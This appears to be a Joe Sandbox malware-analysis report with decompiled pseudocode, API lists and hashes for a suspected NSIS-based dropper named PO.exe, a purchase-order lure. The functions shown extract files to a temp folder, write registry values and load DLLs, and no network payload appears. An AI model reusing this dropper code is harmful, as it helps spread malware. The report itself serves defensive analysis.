Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00401767(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 0xc) = E00402BBF(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x2c) & 0x00000007;
				_t35 = E00405BA9( *(_t86 - 0xc));
				_push( *(_t86 - 0xc));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405B32(E0040617E(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes\\Referenceliste\\holdovers")), ??);
				} else {
					E0040617E();
				}
				E00406412(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004064C1(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x20);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D2E(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D53(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 8) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052DD(0xffffffe2,  *(_t86 - 0xc));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2c8;
						goto L32;
					} else {
						E0040617E("C:\Users\Arthur\AppData\Local\Temp\nsr9735.tmp", _t81);
						E0040617E(_t81, _t84);
						E004061A0(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsr9735.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x18)));
						E0040617E(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsr9735.tmp");
						_t64 = E004058C3("C:\Users\Arthur\AppData\Local\Temp\nsr9735.tmp\System.dll",  *(_t86 - 0x2c) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2c8 =  &( *0x42a2c8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052DD();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052DD(0xffffffea,  *(_t86 - 0xc)); // executed
				 *0x42a2f4 =  *0x42a2f4 + 1;
				_t45 = E004030E7(_t79,  *((intOrPtr*)(_t86 - 0x24)),  *(_t86 - 8), _t77, _t77); // executed
				 *0x42a2f4 =  *0x42a2f4 - 1;
				__eflags =  *(_t86 - 0x20) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x20) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 8), _t86 - 0x20, _t77, _t86 - 0x20); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x1c)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004061A0(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E004061A0(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 0xc));
					}
					_push(0x200010);
					_push(_t84);
					E004058C3();
					goto L29;
				}
				goto L33;
			}

0x00401767
0x0040176e
0x0040177a
0x0040177d
0x00401782
0x00401785
0x0040178c
0x004017a8
0x0040178e
0x0040178f
0x0040178f
0x004017ae
0x004017b3
0x004017b3
0x004017b7
0x004017ba
0x004017bf
0x004017c1
0x004017c3
0x004017c8
0x004017c8
0x004017d3
0x004017d3
0x004017e4
0x004017e6
0x004017e6
0x004017e7
0x004017e7
0x004017ea
0x004017ed
0x004017f0
0x004017f0
0x004017f7
0x00401806
0x0040180b
0x0040180e
0x00401811
0x00000000
0x00000000
0x00401813
0x00401816
0x0040186c
0x00401871
0x004015ae
0x0040281e
0x0040281e
0x00402a4c
0x00402a4f
0x00402a4f
0x00000000
0x00401818
0x0040181e
0x00401825
0x00401832
0x0040183d
0x00401853
0x00401853
0x00401856
0x00000000
0x0040185c
0x0040185c
0x0040185d
0x0040187a
0x00402a55
0x00402a55
0x00402a55
0x0040185f
0x0040185f
0x00401860
0x00401493
0x00402288
0x00402288
0x00402288
0x0040185d
0x00401856
0x00402a57
0x00402a5b
0x00402a5b
0x0040188a
0x0040188f
0x0040189d
0x004018a2
0x004018a8
0x004018ac
0x004018ae
0x004018b6
0x004018c2
0x004018b0
0x004018b0
0x004018b4
0x00000000
0x00000000
0x004018b4
0x004018cb
0x004018d1
0x004018d3
0x00000000
0x004018d9
0x004018d9
0x004018dc
0x004018f4
0x004018de
0x004018e1
0x004018ea
0x004018ea
0x004018f9
0x004018fe
0x00402283
0x00000000
0x00402283
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers,?,?,00000031), ref: 004017CD

Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B

Part of subcall function 004052DD: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
Part of subcall function 004052DD: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00402E19), ref: 00405338
Part of subcall function 004052DD: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll), ref: 0040534A
Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398

Strings

Call, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers, xrefs: 00401796
C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll, xrefs: 0040182D, 00401849
C:\Users\user\AppData\Local\Temp\nsr9735.tmp, xrefs: 00401819, 00401837

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers$C:\Users\user\AppData\Local\Temp\nsr9735.tmp$C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll$Call
API String ID: 1941528284-2346859787
Opcode ID: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
Instruction ID: b64174440326d41e90dd14f1ad6608c73badddfa8ee8632f400ec40acf256ac3
Opcode Fuzzy Hash: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
Instruction Fuzzy Hash: 0C41C431900515BACF117FB5CC46DAE3679EF05329B20827BF422F51E2DA3C86629A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004052DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004052DD(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429224;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2f4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004061A0(_t38, 0, 0x422708, 0x422708, _a4);
					}
					_t27 = lstrlenW(0x422708);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429208, 0x422708); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422708;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422708[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422708, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004052e3
0x004052ed
0x004052f2
0x004052f8
0x00405303
0x00405306
0x00405309
0x0040530f
0x0040530f
0x00405315
0x0040531d
0x00405320
0x0040533d
0x00405341
0x0040534a
0x0040534a
0x00405354
0x0040535d
0x00405369
0x00405370
0x00405374
0x00405377
0x0040538a
0x00405398
0x00405398
0x0040539c
0x0040539e
0x004053a1
0x00000000
0x004053a1
0x00405322
0x0040532a
0x00405332
0x00405338
0x00000000
0x00405338
0x00405332
0x00405320
0x004053ad

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00402E19), ref: 00405338
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll), ref: 0040534A
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll, xrefs: 004052FE, 0040530E, 00405314, 00405337, 00405343

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll
API String ID: 2531174081-2880589808
Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
Instruction ID: d14990956ab1253184f877e9e8298894284f42a30aea32824f5004b5108fa95f
Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
Instruction Fuzzy Hash: 62217F71900518BACF119FA6DD44ACFBFB8EF85354F10807AF904B62A1C7B94A51DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004057AC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004057AC(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004057b7
0x004057bb
0x004057be
0x004057c4
0x004057c8
0x004057cc
0x004057d4
0x004057db
0x004057e1
0x004057e8
0x004057ef
0x004057f7
0x004057f9
0x00000000
0x004057f9
0x00405803
0x0040580a
0x00405820
0x00000000
0x00000000
0x00000000
0x00405822
0x00405826

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
GetLastError.KERNEL32 ref: 00405803
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405818
GetLastError.KERNEL32 ref: 00405822

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057D2
C:\Users\user\Desktop, xrefs: 004057AC

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-26219170
Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
Instruction ID: b278f7ea68de5888e34302da86fdb06c438f4ef9b03e74a9ab654546e4f81ce2
Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
Instruction Fuzzy Hash: 89010871D00619DADF10DBA0D9447EFBFB8EB04304F00803ADA44B6190E7789618DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004064E8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004064E8(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004064ff
0x00406508
0x0040650a
0x0040650a
0x0040650e
0x00406521
0x0040651b
0x0040651b
0x0040651b
0x0040653a
0x0040654e
0x00406555

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
wsprintfW.USER32 ref: 0040653A
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E

Strings

UXTHEME, xrefs: 004064F1
%s%S.dll, xrefs: 00406534
\, xrefs: 00406510

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
Instruction ID: c6b4a3c42f63eea3762d57d51081eb848d485012b63e63803453d9912f42ff06
Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
Instruction Fuzzy Hash: 3AF0FC70500219BADB10AB64ED0DF9B366CAB00304F10403AA646F10D0EB7CD725CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0040237B(void* __eax) {
				void* _t17;
				short* _t20;
				int _t21;
				long _t24;
				char _t26;
				int _t29;
				intOrPtr _t37;
				void* _t39;

				_t17 = E00402CB4(__eax);
				_t37 =  *((intOrPtr*)(_t39 - 0x1c));
				 *(_t39 - 0x34) =  *(_t39 - 0x18);
				 *(_t39 - 8) = E00402BBF(2);
				_t20 = E00402BBF(0x11);
				_t33 =  *0x42a2f0 | 0x00000002;
				 *(_t39 - 4) = 1;
				_t21 = RegCreateKeyExW(_t17, _t20, _t29, _t29, _t29,  *0x42a2f0 | 0x00000002, _t29, _t39 + 8, _t29); // executed
				if(_t21 == 0) {
					if(_t37 == 1) {
						E00402BBF(0x23);
						_t21 = lstrlenW(0x40b5d8) + _t28 + 2;
					}
					if(_t37 == 4) {
						_t26 = E00402BA2(3);
						 *0x40b5d8 = _t26;
						_t21 = _t37;
					}
					if(_t37 == 3) {
						_t21 = E004030E7(_t33,  *((intOrPtr*)(_t39 - 0x20)), _t29, 0x40b5d8, 0x1800);
					}
					_t24 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 8), _t29,  *(_t39 - 0x34), 0x40b5d8, _t21); // executed
					if(_t24 == 0) {
						 *(_t39 - 4) = _t29;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t39 - 4);
				return 0;
			}

0x0040237c
0x00402381
0x0040238b
0x00402395
0x00402398
0x004023a8
0x004023b2
0x004023b9
0x004023c1
0x004023cf
0x004023d3
0x004023de
0x004023de
0x004023e5
0x004023e9
0x004023ef
0x004023f4
0x004023f4
0x004023f8
0x00402404
0x00402404
0x00402415
0x0040241d
0x0040241f
0x0040241f
0x00402422
0x004024f6
0x004024f6
0x00402a4f
0x00402a5b

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr9735.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr9735.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr9735.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

C:\Users\user\AppData\Local\Temp\nsr9735.tmp, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsr9735.tmp
API String ID: 1356686001-3103543027
Opcode ID: cd6d4c48b0c6b17b23d265fb4390c97c9a095f979bd604b51657a4d03f047cf7
Instruction ID: d84b147cfae213de6894e87518a1957a70c03431d85ade02b305fde94438308f
Opcode Fuzzy Hash: cd6d4c48b0c6b17b23d265fb4390c97c9a095f979bd604b51657a4d03f047cf7
Instruction Fuzzy Hash: E511C071E00108BFEB10AFA4DE89DAE777DEB14358F11403AF904B71D1DBB85E409668

Uniqueness

Uniqueness Score: -1.00%

Function 00405D82 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D82(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a584; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405d88
0x00405d8e
0x00405d8f
0x00405d8f
0x00405d94
0x00405d95
0x00405d98
0x00405d9d
0x00405da0
0x00405daa
0x00405db7
0x00405dbb
0x00405dc3
0x00000000
0x00000000
0x00405dc7
0x00000000
0x00405dc9
0x00405dc9
0x00405dc9
0x00405dcc
0x00405dcf
0x00405dcf
0x00405dd2
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405DA0
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PO.exe",004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405DBB

Strings

"C:\Users\user\Desktop\PO.exe", xrefs: 00405D82
nsa, xrefs: 00405D8F
C:\Users\user\AppData\Local\Temp\, xrefs: 00405D87

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
